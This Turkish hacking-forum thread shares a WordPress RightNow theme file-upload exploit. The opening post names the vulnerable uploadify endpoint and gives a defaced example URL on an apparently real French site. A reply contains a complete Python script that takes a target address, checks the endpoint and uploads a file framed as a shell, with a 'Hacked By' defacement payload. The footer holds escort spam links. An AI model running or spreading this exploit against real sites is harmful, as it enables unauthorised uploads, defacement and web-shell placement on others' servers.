⚠️ ÖNEMLİ DUYURU — KİŞİSEL VERİ VE YASADIŞI PAYLAŞIMLAR

Forumda kişisel bilgi (ad, adres, telefon vb.) veya yasa dışı içerik paylaşımı kesinlikle yasaktır. Bu tür paylaşımlar KVKK ve ilgili yasalar gereği suç teşkil eder.

Paylaşım yapan kullanıcıların hesapları kalıcı olarak kapatılacak ve resmî makamlara bildirilecektir. Forum yönetimi, yasal zorunluluklar gereği IP ve oturum kayıtlarını saklamaktadır.

Lütfen gizliliğe ve topluluk kurallarına dikkat ediniz. — Ajanlar.Org Yönetimi

Wordpress Exploit RightNow File Upload

Antidote

Özel Üye
Katılım
21 Ocak 2014
Mesajlar
1,015
Tepkime puanı
1
Puanları
0
Web sitesi
ajanlar.org
Ajanlar İçin Çektigim Bir exploit anlatımı yeni arkadaşlarımızı Exploitler Hakkında bilgilendirmeye Devam ediyorum :)
[video=youtube]
Kod:
Örnek;
http://ugotsv.fr//wp-content/uploads/settingsimages/ajanlar.html
http://ugotsv.fr/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php
Dosyalar;
Gizli içeriği görüntüleme kayıtlı kullanıcılar için mevcuttur!
 

KingDoz

Forumdan Uzaklaştırıldı
Katılım
23 Haz 2015
Mesajlar
1,403
Tepkime puanı
0
Puanları
0
Yaş
34
Guzel.
 

v30sharp

Yeni Üye
Katılım
20 Ocak 2014
Mesajlar
47
Tepkime puanı
0
Puanları
0
Kod:
#!/usr/bin/env python
import urllib2
import requests

print "   __        __    _  __      _  __       "
print "  / / __  __ \ \  | |/ /_ __ (_)/ _| ___  "
print " | |  \ \/ /  | | | ' /| '_ \| | |_ / _ \ "
print " | |   >  <   | | | . \| | | | |  _|  __/ "
print " | |  /_/\_\  | | |_|\_\_| |_|_|_|  \___| "
print "  \_\        /_/                          "
print "\n\t\tIn The Name Of World Programmer"
print ""
print "\tExploit : Wordpress  RightNow File Upload "
print ""
print "\t\tWeb Site : xknife.org"
print " \t\tprogrammer : Mohammad Farhad-Zadeh"
print "\t\tWednesday - 2015 15 July"
print ""





_Url=raw_input("[Xknife.org]-Enter Target WebSite address [exp: http://target.com ] :>")
_Vuln=_Url+"/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php"
_Check=urllib2.urlopen(_Vuln)
if _Check.code == 200:
    print "[Xknife.org]-Start Shell Uploading..."

    r=requests.post(url=_Vuln, files={"Filedata":("xknife6.txt", "Hacked By Xknife.org")})
    if "OK" in r.text:
        print "[Xknife.org]-File Uploaded..."
        print "[Xknife.org]-shell Address Sample http://target.com/wp-content/uploads/settingsimages/[shellname]"


    else:
        "[Xknife.org]-Shell Upload Faild!"

else:
    print "[Xknife.org]-Oops! We Have Some Error!"
 

captainbrain

Prof Spys-z
Katılım
15 Ağu 2015
Mesajlar
1,006
Tepkime puanı
1
Puanları
0
Video neden kalkti baskanim
 

mersin escort mersin e ticaret bodrum escort fethiye escort alanya escort konya escort konya escort bodrum escort vozol sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort Vitamin, Takviye ve Dermokozmetik Ürünler
Üst
Copyright® Ajanlar.org 2012